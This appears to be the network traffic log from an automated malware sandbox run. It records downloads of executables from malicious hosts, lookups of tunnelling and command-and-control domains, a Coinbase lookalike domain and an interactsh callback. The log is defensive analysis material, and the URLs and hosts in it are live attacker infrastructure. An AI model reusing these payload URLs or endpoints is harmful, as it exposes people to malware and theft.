Server: HFS 2.3c
Set-Cookie: HFS_SID=0.533177969045937; path=/;
Last-Modified: Thu, 20 Jul 2017 08:58:00 GMT
Content-Disposition: attachment; filename="02.exe";
GET

http://webmail.kasihcommunityschool.sch.id/mk/drop1.exe

Remote address:

66.63.187.250:80

Request

GET /mk/drop1.exe HTTP/1.1
Host: webmail.kasihcommunityschool.sch.id
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Mon, 13 Jan 2025 17:43:31 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Last-Modified: Sat, 28 Dec 2024 12:51:27 GMT
ETag: "13bc00-62a54099d2418"
Accept-Ranges: bytes
Content-Length: 1293312
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
GET

http://82.140.14.10:8080/wudi.exe

Remote address:

82.140.14.10:8080

Request

GET /wudi.exe HTTP/1.1
Host: 82.140.14.10:8080
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Content-Type: application/octet-stream
Content-Length: 1625790
Accept-Ranges: bytes
Server: HFS 2.3c
Set-Cookie: HFS_SID=0.937961472431198; path=/;
Last-Modified: Thu, 20 Jul 2017 00:07:14 GMT
Content-Disposition: attachment; filename="wudi.exe";
DNS

10.14.140.82.in-addr.arpa

Remote address:

8.8.8.8:53

Request

10.14.140.82.in-addr.arpa

IN PTR

Response
GET

http://82.140.14.10:8080/64.exe

Remote address:

82.140.14.10:8080

Request

GET /64.exe HTTP/1.1
Host: 82.140.14.10:8080
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Content-Type: application/octet-stream
Content-Length: 1425408
Accept-Ranges: bytes
Server: HFS 2.3c
Set-Cookie: HFS_SID=0.957801794400439; path=/;
Last-Modified: Thu, 20 Jul 2017 08:57:59 GMT
Content-Disposition: attachment; filename="64.exe";
GET

http://43.240.65.55:81/IMG001.exe

Remote address:

43.240.65.55:81

Request

GET /IMG001.exe HTTP/1.1
Host: 43.240.65.55:81
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Content-Type: application/octet-stream
Last-Modified: Sat, 23 Dec 2023 11:04:49 GMT
Accept-Ranges: bytes
ETag: "d92f18d98f35da1:0"
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Mon, 13 Jan 2025 17:43:35 GMT
Content-Length: 3553626
DNS

www.fexe-tmp-1.top

Remote address:

8.8.8.8:53

Request

www.fexe-tmp-1.top

IN A

Response

www.fexe-tmp-1.top

IN A

185.221.219.112
DNS

www.fexe-tmp-1.top

Remote address:

8.8.8.8:53

Request

www.fexe-tmp-1.top

IN A

Response

www.fexe-tmp-1.top

IN A

185.221.219.112
DNS

LETSQOOO-62766.portmap.host

Remote address:

8.8.8.8:53

Request

LETSQOOO-62766.portmap.host

IN A

Response
DNS

LETSQOOO-62766.portmap.host

Remote address:

8.8.8.8:53

Request

LETSQOOO-62766.portmap.host

IN A

Response
GET

http://www.fexe-tmp-1.top/get/415oaux32/Kerish_Doctor_2022.exe

Remote address:

185.221.219.112:80

Request

GET /get/415oaux32/Kerish_Doctor_2022.exe HTTP/1.1
Host: www.fexe-tmp-1.top
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx
Date: Mon, 13 Jan 2025 17:43:34 GMT
Content-Type: application/octet-stream
Content-Length: 34315146
Last-Modified: Tue, 27 Aug 2024 15:08:43 GMT
Connection: keep-alive
ETag: "66cdebfb-20b9b8a"
Accept-Ranges: bytes
DNS

55.65.240.43.in-addr.arpa

Remote address:

8.8.8.8:53

Request

55.65.240.43.in-addr.arpa

IN PTR

Response
DNS

55.65.240.43.in-addr.arpa

Remote address:

8.8.8.8:53

Request

55.65.240.43.in-addr.arpa

IN PTR

Response
DNS

55.65.240.43.in-addr.arpa

Remote address:

8.8.8.8:53

Request

55.65.240.43.in-addr.arpa

IN PTR

Response
DNS

112.219.221.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

112.219.221.185.in-addr.arpa

IN PTR

Response

112.219.221.185.in-addr.arpa

IN PTR

112-219-221-185clientsgthostcom
DNS

112.219.221.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

112.219.221.185.in-addr.arpa

IN PTR

Response

112.219.221.185.in-addr.arpa

IN PTR

112-219-221-185clientsgthostcom
DNS

wiso-fs-1.top

Remote address:

8.8.8.8:53

Request

wiso-fs-1.top

IN A

Response

wiso-fs-1.top

IN A

185.221.219.112
DNS

wiso-fs-1.top

Remote address:

8.8.8.8:53

Request

wiso-fs-1.top

IN A

Response

wiso-fs-1.top

IN A

185.221.219.112
GET

http://wiso-fs-1.top/get/415oaux32/Kerish_Doctor_2023.exe

Remote address:

185.221.219.112:80

Request

GET /get/415oaux32/Kerish_Doctor_2023.exe HTTP/1.1
Host: wiso-fs-1.top
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx
Date: Mon, 13 Jan 2025 17:43:36 GMT
Content-Type: application/octet-stream
Content-Length: 34315146
Last-Modified: Tue, 27 Aug 2024 15:08:43 GMT
Connection: keep-alive
ETag: "66cdebfb-20b9b8a"
Accept-Ranges: bytes
DNS

wt-tmp-1.top

Remote address:

8.8.8.8:53

Request

wt-tmp-1.top

IN A

Response

wt-tmp-1.top

IN A

185.221.219.112
DNS

wt-tmp-1.top

Remote address:

8.8.8.8:53

Request

wt-tmp-1.top

IN A

Response

wt-tmp-1.top

IN A

185.221.219.112
GET

http://wt-tmp-1.top/get/415oaux32/Kerish_Doctor.exe

Remote address:

185.221.219.112:80

Request

GET /get/415oaux32/Kerish_Doctor.exe HTTP/1.1
Host: wt-tmp-1.top
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx
Date: Mon, 13 Jan 2025 17:43:36 GMT
Content-Type: application/octet-stream
Content-Length: 34315146
Last-Modified: Tue, 27 Aug 2024 15:08:43 GMT
Connection: keep-alive
ETag: "66cdebfb-20b9b8a"
Accept-Ranges: bytes
GET

http://wiso-fs-1.top/get/415oaux32/Kerish_Doctor_2021.exe

Remote address:

185.221.219.112:80

Request

GET /get/415oaux32/Kerish_Doctor_2021.exe HTTP/1.1
Host: wiso-fs-1.top
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx
Date: Mon, 13 Jan 2025 17:43:39 GMT
Content-Type: application/octet-stream
Content-Length: 34315146
Last-Modified: Tue, 27 Aug 2024 15:08:43 GMT
Connection: keep-alive
ETag: "66cdebfb-20b9b8a"
Accept-Ranges: bytes
GET

http://wt-tmp-1.top/get/415oaux32/Kerish_Doctor_Windows_8.2.exe

Remote address:

185.221.219.112:80

Request

GET /get/415oaux32/Kerish_Doctor_Windows_8.2.exe HTTP/1.1
Host: wt-tmp-1.top
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx
Date: Mon, 13 Jan 2025 17:43:40 GMT
Content-Type: application/octet-stream
Content-Length: 34315146
Last-Modified: Tue, 27 Aug 2024 15:08:43 GMT
Connection: keep-alive
ETag: "66cdebfb-20b9b8a"
Accept-Ranges: bytes
DNS

run-motherboard.gl.at.ply.gg

Remote address:

8.8.8.8:53

Request

run-motherboard.gl.at.ply.gg

IN A

Response

run-motherboard.gl.at.ply.gg

IN A

147.185.221.17
DNS

run-motherboard.gl.at.ply.gg

Remote address:

8.8.8.8:53

Request

run-motherboard.gl.at.ply.gg

IN A

Response

run-motherboard.gl.at.ply.gg

IN A

147.185.221.17
GET

http://wt-tmp-1.top/get/415oaux32/Kerish_Doctor_Windows_XP.exe

Remote address:

185.221.219.112:80

Request

GET /get/415oaux32/Kerish_Doctor_Windows_XP.exe HTTP/1.1
Host: wt-tmp-1.top
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx
Date: Mon, 13 Jan 2025 17:43:41 GMT
Content-Type: application/octet-stream
Content-Length: 34315146
Last-Modified: Tue, 27 Aug 2024 15:08:43 GMT
Connection: keep-alive
ETag: "66cdebfb-20b9b8a"
Accept-Ranges: bytes
GET

http://www.fexe-tmp-1.top/get/415oaux32/Kerish_Doctor_Windows.exe

Remote address:

185.221.219.112:80

Request

GET /get/415oaux32/Kerish_Doctor_Windows.exe HTTP/1.1
Host: www.fexe-tmp-1.top
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx
Date: Mon, 13 Jan 2025 17:43:44 GMT
Content-Type: application/octet-stream
Content-Length: 34315146
Last-Modified: Tue, 27 Aug 2024 15:08:43 GMT
Connection: keep-alive
ETag: "66cdebfb-20b9b8a"
Accept-Ranges: bytes
DNS

wzt5xcg.localto.net

Remote address:

8.8.8.8:53

Request

wzt5xcg.localto.net

IN A

Response

wzt5xcg.localto.net

IN A

116.203.56.216
DNS

wzt5xcg.localto.net

Remote address:

8.8.8.8:53

Request

wzt5xcg.localto.net

IN A

Response

wzt5xcg.localto.net

IN A

116.203.56.216
DNS

moonloaderupdate.ru

Remote address:

8.8.8.8:53

Request

moonloaderupdate.ru

IN A

Response

moonloaderupdate.ru

IN A

37.140.192.16
DNS

moonloaderupdate.ru

Remote address:

8.8.8.8:53

Request

moonloaderupdate.ru

IN A

Response

moonloaderupdate.ru

IN A

37.140.192.16
DNS

location.services.mozilla.com

Remote address:

8.8.8.8:53

Request

location.services.mozilla.com

IN A

Response

location.services.mozilla.com

IN CNAME

prod.classify-client.prod.webservices.mozgcp.net

prod.classify-client.prod.webservices.mozgcp.net

IN A

35.190.72.216
DNS

prod.classify-client.prod.webservices.mozgcp.net

Remote address:

8.8.8.8:53

Request

prod.classify-client.prod.webservices.mozgcp.net

IN A

Response

prod.classify-client.prod.webservices.mozgcp.net

IN A

35.190.72.216
DNS

prod.remote-settings.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.remote-settings.prod.webservices.mozgcp.net

IN AAAA

Response
DNS

prod.remote-settings.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.remote-settings.prod.webservices.mozgcp.net

IN AAAA

Response
DNS

prod.classify-client.prod.webservices.mozgcp.net

Remote address:

8.8.8.8:53

Request

prod.classify-client.prod.webservices.mozgcp.net

IN AAAA

Response
DNS

prod.classify-client.prod.webservices.mozgcp.net

Remote address:

8.8.8.8:53

Request

prod.classify-client.prod.webservices.mozgcp.net

IN AAAA

Response
DNS

216.72.190.35.in-addr.arpa

Remote address:

8.8.8.8:53

Request

216.72.190.35.in-addr.arpa

IN PTR

Response

216.72.190.35.in-addr.arpa

IN PTR

2167219035bcgoogleusercontentcom
DNS

216.72.190.35.in-addr.arpa

Remote address:

8.8.8.8:53

Request

216.72.190.35.in-addr.arpa

IN PTR

Response

216.72.190.35.in-addr.arpa

IN PTR

2167219035bcgoogleusercontentcom
DNS

spocs.getpocket.com

firefox.exe

Remote address:

8.8.8.8:53

Request

spocs.getpocket.com

IN A

Response

spocs.getpocket.com

IN CNAME

prod.ads.prod.webservices.mozgcp.net

prod.ads.prod.webservices.mozgcp.net

IN A

34.117.188.166
DNS

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

IN AAAA

Response

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

IN AAAA

2600:1901:0:74e4::
DNS

shavar.prod.mozaws.net

Remote address:

8.8.8.8:53

Request

shavar.prod.mozaws.net

IN A

Response

shavar.prod.mozaws.net

IN A

52.41.23.50

shavar.prod.mozaws.net

IN A

44.233.129.8

shavar.prod.mozaws.net

IN A

44.235.50.64
DNS

prod.ads.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.ads.prod.webservices.mozgcp.net

IN A

Response

prod.ads.prod.webservices.mozgcp.net

IN A

34.117.188.166
DNS

prod.ads.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.ads.prod.webservices.mozgcp.net

IN AAAA

Response
DNS

prod.ads.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.ads.prod.webservices.mozgcp.net

IN AAAA

Response
DNS

shavar.prod.mozaws.net

Remote address:

8.8.8.8:53

Request

shavar.prod.mozaws.net

IN AAAA

Response
GET

http://www.fexe-tmp-1.top/get/415oaux32/Kerish_Doctor_Windows_8.exe

Remote address:

185.221.219.112:80

Request

GET /get/415oaux32/Kerish_Doctor_Windows_8.exe HTTP/1.1
Host: www.fexe-tmp-1.top
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx
Date: Mon, 13 Jan 2025 17:43:48 GMT
Content-Type: application/octet-stream
Content-Length: 34315146
Last-Modified: Tue, 27 Aug 2024 15:08:43 GMT
Connection: keep-alive
ETag: "66cdebfb-20b9b8a"
Accept-Ranges: bytes
DNS

prod.content-signature-chains.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.content-signature-chains.prod.webservices.mozgcp.net

IN AAAA

Response

prod.content-signature-chains.prod.webservices.mozgcp.net

IN AAAA

2600:1901:0:92a9::
DNS

64.50.235.44.in-addr.arpa

Remote address:

8.8.8.8:53

Request

64.50.235.44.in-addr.arpa

IN PTR

Response

64.50.235.44.in-addr.arpa

IN PTR

ec2-44-235-50-64 us-west-2compute amazonawscom
DNS

64.50.235.44.in-addr.arpa

Remote address:

8.8.8.8:53

Request

64.50.235.44.in-addr.arpa

IN PTR

Response

64.50.235.44.in-addr.arpa

IN PTR

ec2-44-235-50-64 us-west-2compute amazonawscom
DNS

tracking-protection.cdn.mozilla.net

Remote address:

8.8.8.8:53

Request

tracking-protection.cdn.mozilla.net

IN A

Response

tracking-protection.cdn.mozilla.net

IN CNAME

tracking-protection.prod.mozaws.net

tracking-protection.prod.mozaws.net

IN A

34.120.158.37
DNS

tracking-protection.prod.mozaws.net

Remote address:

8.8.8.8:53

Request

tracking-protection.prod.mozaws.net

IN A

Response

tracking-protection.prod.mozaws.net

IN A

34.120.158.37
DNS

tracking-protection.prod.mozaws.net

Remote address:

8.8.8.8:53

Request

tracking-protection.prod.mozaws.net

IN AAAA

Response
DNS

37.158.120.34.in-addr.arpa

Remote address:

8.8.8.8:53

Request

37.158.120.34.in-addr.arpa

IN PTR

Response

37.158.120.34.in-addr.arpa

IN PTR

3715812034bcgoogleusercontentcom
DNS

37.158.120.34.in-addr.arpa

Remote address:

8.8.8.8:53

Request

37.158.120.34.in-addr.arpa

IN PTR
DNS

tracking-protection.cdn.mozilla.net

Remote address:

8.8.8.8:53

Request

tracking-protection.cdn.mozilla.net

IN A

Response

tracking-protection.cdn.mozilla.net

IN CNAME

tracking-protection.prod.mozaws.net

tracking-protection.prod.mozaws.net

IN A

34.120.158.37
DNS

tracking-protection.cdn.mozilla.net

Remote address:

8.8.8.8:53

Request

tracking-protection.cdn.mozilla.net

IN A

Response

tracking-protection.cdn.mozilla.net

IN CNAME

tracking-protection.prod.mozaws.net

tracking-protection.prod.mozaws.net

IN A

34.120.158.37
GET

http://wiso-fs-1.top/get/415oaux32/Kerish_Doctor_2017.exe

Remote address:

185.221.219.112:80

Request

GET /get/415oaux32/Kerish_Doctor_2017.exe HTTP/1.1
Host: wiso-fs-1.top
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx
Date: Mon, 13 Jan 2025 17:43:50 GMT
Content-Type: application/octet-stream
Content-Length: 34315146
Last-Modified: Tue, 27 Aug 2024 15:08:43 GMT
Connection: keep-alive
ETag: "66cdebfb-20b9b8a"
Accept-Ranges: bytes
DNS

www.google.com

Request

www.google.com

IN A

Response

www.google.com

IN A

142.250.187.196
DNS

www.google.com

Request

www.google.com

IN A

Response

www.google.com

IN A

142.250.187.196
DNS

pastesnap.com

Request

pastesnap.com

IN A

Response

pastesnap.com

IN A

172.67.198.113

pastesnap.com

IN A

104.21.60.172
DNS

pastesnap.com

Request

pastesnap.com

IN A

Response

pastesnap.com

IN A

104.21.60.172

pastesnap.com

IN A

172.67.198.113
DNS

113.198.67.172.in-addr.arpa

Request

113.198.67.172.in-addr.arpa

IN PTR

Response
DNS

113.198.67.172.in-addr.arpa

Request

113.198.67.172.in-addr.arpa

IN PTR

Response
DNS

pastesnap.com

Request

pastesnap.com

IN A

Response

pastesnap.com

IN A

172.67.198.113

pastesnap.com

IN A

104.21.60.172
DNS

pastesnap.com

Request

pastesnap.com

IN A

Response

pastesnap.com

IN A

172.67.198.113

pastesnap.com

IN A

104.21.60.172
DNS

tracking-protection.prod.mozaws.net

Request

tracking-protection.prod.mozaws.net

IN AAAA

Response
DNS

tracking-protection.prod.mozaws.net

Request

tracking-protection.prod.mozaws.net

IN AAAA

Response
DNS

wydkowqbjycsuwapzymz8ia5edhi9t1d7.oast.fun

Request

wydkowqbjycsuwapzymz8ia5edhi9t1d7.oast.fun

IN A

Response

wydkowqbjycsuwapzymz8ia5edhi9t1d7.oast.fun

IN A

206.189.156.69
DNS

wydkowqbjycsuwapzymz8ia5edhi9t1d7.oast.fun

Request

wydkowqbjycsuwapzymz8ia5edhi9t1d7.oast.fun

IN A

Response

wydkowqbjycsuwapzymz8ia5edhi9t1d7.oast.fun

IN A

206.189.156.69
GET

http://wydkowqbjycsuwapzymz8ia5edhi9t1d7.oast.fun/

Request

GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.2; en-US) WindowsPowerShell/5.1.19041.4522
Host: wydkowqbjycsuwapzymz8ia5edhi9t1d7.oast.fun
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Content-Type, Authorization
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Server: oast.fun
X-Interactsh-Version: 1.2.2
Date: Mon, 13 Jan 2025 17:44:00 GMT
Content-Length: 72
DNS

69.156.189.206.in-addr.arpa

Request

69.156.189.206.in-addr.arpa

IN PTR

Response

69.156.189.206.in-addr.arpa

IN PTR

oastfun
DNS

pastesnap.com

Request

pastesnap.com

IN A

Response

pastesnap.com

IN A

104.21.60.172

pastesnap.com

IN A

172.67.198.113
GET

http://45.125.67.168/stelin/Crawl.exe

Request

GET /stelin/Crawl.exe HTTP/1.1
Host: 45.125.67.168
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Mon, 13 Jan 2025 17:44:05 GMT
Content-Type: application/octet-stream
Content-Length: 892416
Last-Modified: Tue, 07 Jan 2025 07:22:06 GMT
Connection: keep-alive
ETag: "677cd61e-d9e00"
Accept-Ranges: bytes
DNS

ipinfo.io

Request

ipinfo.io

IN A

Response

ipinfo.io

IN A

34.117.59.81
DNS

ipinfo.io

Request

ipinfo.io

IN A
GET

http://ipinfo.io/country

Request

GET /country HTTP/1.1
Host: ipinfo.io
User-Agent: curl/8.7.1
Accept: */*

Response

HTTP/1.1 200 OK

access-control-allow-origin: *
Content-Length: 3
content-type: text/html; charset=utf-8
date: Mon, 13 Jan 2025 17:44:08 GMT
referrer-policy: strict-origin-when-cross-origin
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-xss-protection: 1; mode=block
via: 1.1 google
strict-transport-security: max-age=2592000; includeSubDomains
DNS

81.59.117.34.in-addr.arpa

Request

81.59.117.34.in-addr.arpa

IN PTR

Response

81.59.117.34.in-addr.arpa

IN PTR

815911734bcgoogleusercontentcom
GET

http://103.243.25.70:6666/02.08.2022.exe

Request

GET /02.08.2022.exe HTTP/1.1
Host: 103.243.25.70:6666
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Mon, 13 Jan 2025 17:44:15 GMT
Content-Type: application/octet-stream
Content-Length: 239689
DNS

prod.balrog.prod.cloudops.mozgcp.net

Request

prod.balrog.prod.cloudops.mozgcp.net

IN A

Response

prod.balrog.prod.cloudops.mozgcp.net

IN A

35.244.181.201
DNS

prod.balrog.prod.cloudops.mozgcp.net

Request

prod.balrog.prod.cloudops.mozgcp.net

IN AAAA

Response
DNS

prod.balrog.prod.cloudops.mozgcp.net

Request

prod.balrog.prod.cloudops.mozgcp.net

IN AAAA

Response
DNS

70.25.243.103.in-addr.arpa

Request

70.25.243.103.in-addr.arpa

IN PTR

Response
DNS

ciscobinary.openh264.org

Request

ciscobinary.openh264.org

IN A

Response

ciscobinary.openh264.org

IN CNAME

a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.com

a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.com

IN CNAME

a17.rackcdn.com

a17.rackcdn.com

IN CNAME

a17.rackcdn.com.mdc.edgesuite.net

a17.rackcdn.com.mdc.edgesuite.net

IN CNAME

a19.dscg10.akamai.net

a19.dscg10.akamai.net

IN A

88.221.134.155

a19.dscg10.akamai.net

IN A

88.221.134.209
DNS

ciscobinary.openh264.org

Request

ciscobinary.openh264.org

IN A

Response

ciscobinary.openh264.org

IN CNAME

a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.com

a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.com

IN CNAME

a17.rackcdn.com

a17.rackcdn.com

IN CNAME

a17.rackcdn.com.mdc.edgesuite.net

a17.rackcdn.com.mdc.edgesuite.net

IN CNAME

a19.dscg10.akamai.net

a19.dscg10.akamai.net

IN A

88.221.134.155

a19.dscg10.akamai.net

IN A

88.221.134.209
DNS

redirector.gvt1.com

Request

redirector.gvt1.com

IN A

Response

redirector.gvt1.com

IN A

142.250.180.14
DNS

redirector.gvt1.com

Request

redirector.gvt1.com

IN A

Response

redirector.gvt1.com

IN A

142.250.180.14
GET

http://ciscobinary.openh264.org/openh264-win64-31c4d2e4a037526fd30d4e5c39f60885986cf865.zip

Request

GET /openh264-win64-31c4d2e4a037526fd30d4e5c39f60885986cf865.zip HTTP/1.1
Host: ciscobinary.openh264.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive

Response

HTTP/1.1 200 OK

Last-Modified: Fri, 08 Nov 2024 02:37:54 GMT
ETag: 09372174e83dbbf696ee732fd2e875bb
Content-Length: 491284
Accept-Ranges: bytes
X-Timestamp: 1731033473.13891
Content-Type: application/zip
X-Trans-Id: txe2d6fd5524464f55a6fac-00673047f0dfw1
Cache-Control: public, max-age=219508
Expires: Thu, 16 Jan 2025 06:42:44 GMT
Date: Mon, 13 Jan 2025 17:44:16 GMT
Connection: keep-alive
DNS

a19.dscg10.akamai.net

Request

a19.dscg10.akamai.net

IN A

Response

a19.dscg10.akamai.net

IN A

88.221.134.209

a19.dscg10.akamai.net

IN A

88.221.134.155
DNS

a19.dscg10.akamai.net

Request

a19.dscg10.akamai.net

IN A

Response

a19.dscg10.akamai.net

IN A

88.221.134.155

a19.dscg10.akamai.net

IN A

88.221.134.209
DNS

redirector.gvt1.com

Request

redirector.gvt1.com

IN AAAA

Response

redirector.gvt1.com

IN AAAA

2a00:1450:4009:81e::200e
DNS

redirector.gvt1.com

Request

redirector.gvt1.com

IN AAAA

Response

redirector.gvt1.com

IN AAAA

2a00:1450:4009:81e::200e
DNS

a19.dscg10.akamai.net

Request

a19.dscg10.akamai.net

IN AAAA

Response

a19.dscg10.akamai.net

IN AAAA

2a02:26f0:a1::58dd:869b

a19.dscg10.akamai.net

IN AAAA

2a02:26f0:a1::58dd:86d1
DNS

a19.dscg10.akamai.net

Request

a19.dscg10.akamai.net

IN AAAA

Response

a19.dscg10.akamai.net

IN AAAA

2a02:26f0:a1::58dd:86d1

a19.dscg10.akamai.net

IN AAAA

2a02:26f0:a1::58dd:869b
DNS

0.tcp.in.ngrok.io

Request

0.tcp.in.ngrok.io

IN A

Response

0.tcp.in.ngrok.io

IN A

3.108.97.190
DNS

0.tcp.in.ngrok.io

Request

0.tcp.in.ngrok.io

IN A

Response

0.tcp.in.ngrok.io

IN A

13.127.206.16
GET

http://www.fexe-tmp-1.top/get/415oaux32/Kerish_Doctor_Windows_Vista.exe

Request

GET /get/415oaux32/Kerish_Doctor_Windows_Vista.exe HTTP/1.1
Host: www.fexe-tmp-1.top
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx
Date: Mon, 13 Jan 2025 17:44:43 GMT
Content-Type: application/octet-stream
Content-Length: 34315146
Last-Modified: Tue, 27 Aug 2024 15:08:43 GMT
Connection: keep-alive
ETag: "66cdebfb-20b9b8a"
Accept-Ranges: bytes
DNS

144.96.94.141.in-addr.arpa

Request

144.96.94.141.in-addr.arpa

IN PTR

Response

144.96.94.141.in-addr.arpa

IN PTR

ns31430818ip-141-94-96eu
DNS

144.96.94.141.in-addr.arpa

Request

144.96.94.141.in-addr.arpa

IN PTR
DNS

clients2.google.com

Request

clients2.google.com

IN A

Response

clients2.google.com

IN CNAME

clients.l.google.com

clients.l.google.com

IN A

142.250.187.238
GET

http://45.125.67.168/stelin/Crawl.exe

Request

GET /stelin/Crawl.exe HTTP/1.1
Host: 45.125.67.168
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Mon, 13 Jan 2025 17:45:14 GMT
Content-Type: application/octet-stream
Content-Length: 892416
Last-Modified: Tue, 07 Jan 2025 07:22:06 GMT
Connection: keep-alive
ETag: "677cd61e-d9e00"
Accept-Ranges: bytes
DNS

stafftest.ru

Request

stafftest.ru

IN A

Response

stafftest.ru

IN A

18.141.10.107
DNS

stafftest.ru

Request

stafftest.ru

IN A
DNS

gitlab.com

Request

gitlab.com

IN A

Response

gitlab.com

IN A

172.65.251.78
DNS

gitlab.com

Request

gitlab.com

IN A

Response

gitlab.com

IN A

172.65.251.78
DNS

api.accueil-coinbase.com

Request

api.accueil-coinbase.com

IN A

Response

api.accueil-coinbase.com

IN A

91.202.233.151
DNS

api.accueil-coinbase.com

Request

api.accueil-coinbase.com

IN A

Response

api.accueil-coinbase.com

IN A

91.202.233.151

13.87.96.169:443

https://checkappexec.microsoft.com/windows/shell/actions

tls, http2

smartscreen.exe

3.0kB
9.8kB
23
20

HTTP Request

POST https://checkappexec.microsoft.com/windows/shell/actions

HTTP Response

200
151.101.194.49:443

https://urlhaus.abuse.ch/downloads/text_online/

tls, http

._cache_New Text Document mod.exe

11.6kB
656.1kB
244
478

HTTP Request

GET https://urlhaus.abuse.ch/downloads/text_online/

HTTP Response

200
185.199.111.133:443

https://raw.githubusercontent.com/dzonicar12332/voidddwareee/refs/heads/main/voidware_loader.exe

tls, http

._cache_New Text Document mod.exe

62.4kB
3.4MB
1320
2424

HTTP Request

GET https://raw.githubusercontent.com/dzonicar12332/voidddwareee/refs/heads/main/voidware_loader.exe

HTTP Response

200
195.177.92.88:80

http://195.177.92.88/build.exe

http

._cache_New Text Document mod.exe

5.5kB
317.1kB
119
229

HTTP Request

GET http://195.177.92.88/build.exe

HTTP Response

200
142.250.187.196:443

https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS117BTGIiglbwGIjBHFCkmmbGmG5r6_bp4TgxWFXoyYLbN0f2U9jjOw6P-5HWIETcCYL4nc1KdgmN2fXwyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM

tls, http2

chrome.exe

3.0kB
17.1kB
28
36

HTTP Request

GET https://www.google.com/async/ddljson?async=ntp:2

HTTP Request

GET https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0

HTTP Request

GET https://www.google.com/async/newtab_promos

HTTP Request

GET https://www.google.com/sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS117BTGIiglbwGIjAQB2eKWFd5_IVTzdT51-2s3mtsuuo9IsGeDAw2jPLRRmY-98jxmcPdEtfbziqroG8yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM

HTTP Request

GET https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS117BTGIiglbwGIjBHFCkmmbGmG5r6_bp4TgxWFXoyYLbN0f2U9jjOw6P-5HWIETcCYL4nc1KdgmN2fXwyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
142.250.187.196:443

www.google.com

chrome.exe

98 B
52 B
2
1
142.250.187.196:443

www.google.com

chrome.exe

98 B
52 B
2
1
106.53.83.169:80

._cache_New Text Document mod.exe

260 B
5
195.177.92.88:1912

build.exe

5.9MB
65.7kB
4319
1454
142.250.187.238:443

clients2.google.com

tls, http2

chrome.exe

953 B
8.1kB
8
8
69.42.215.252:80

http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978

http

Synaptics.exe

752 B
415 B
13
4

HTTP Request

GET http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978

HTTP Response

200
147.185.221.25:11758

other-little.gl.at.ply.gg

DirectX111.exe

260 B
5
172.217.169.78:443

https://drive.google.com/

tls, http2

chrome.exe

2.1kB
10.0kB
15
16

HTTP Request

GET https://drive.google.com/
172.217.169.78:443

drive.google.com

tls, http2

chrome.exe

972 B
8.0kB
8
8
142.250.200.46:443

https://workspace.google.com/assets/f8727730.min.js

tls, http2

chrome.exe

8.4kB
133.4kB
110
107

HTTP Request

GET https://workspace.google.com/intl/en-US/products/drive/

HTTP Request

GET https://workspace.google.com/assets/426a67ed.css

HTTP Request

GET https://workspace.google.com/assets/2bbaf8c6.css

HTTP Request

GET https://workspace.google.com/assets/426a67ed2.css

HTTP Request

GET https://workspace.google.com/assets/f261be23.css

HTTP Request

GET https://workspace.google.com/assets/0d962dee.css

HTTP Request

GET https://workspace.google.com/assets/f1b5e532.min.js

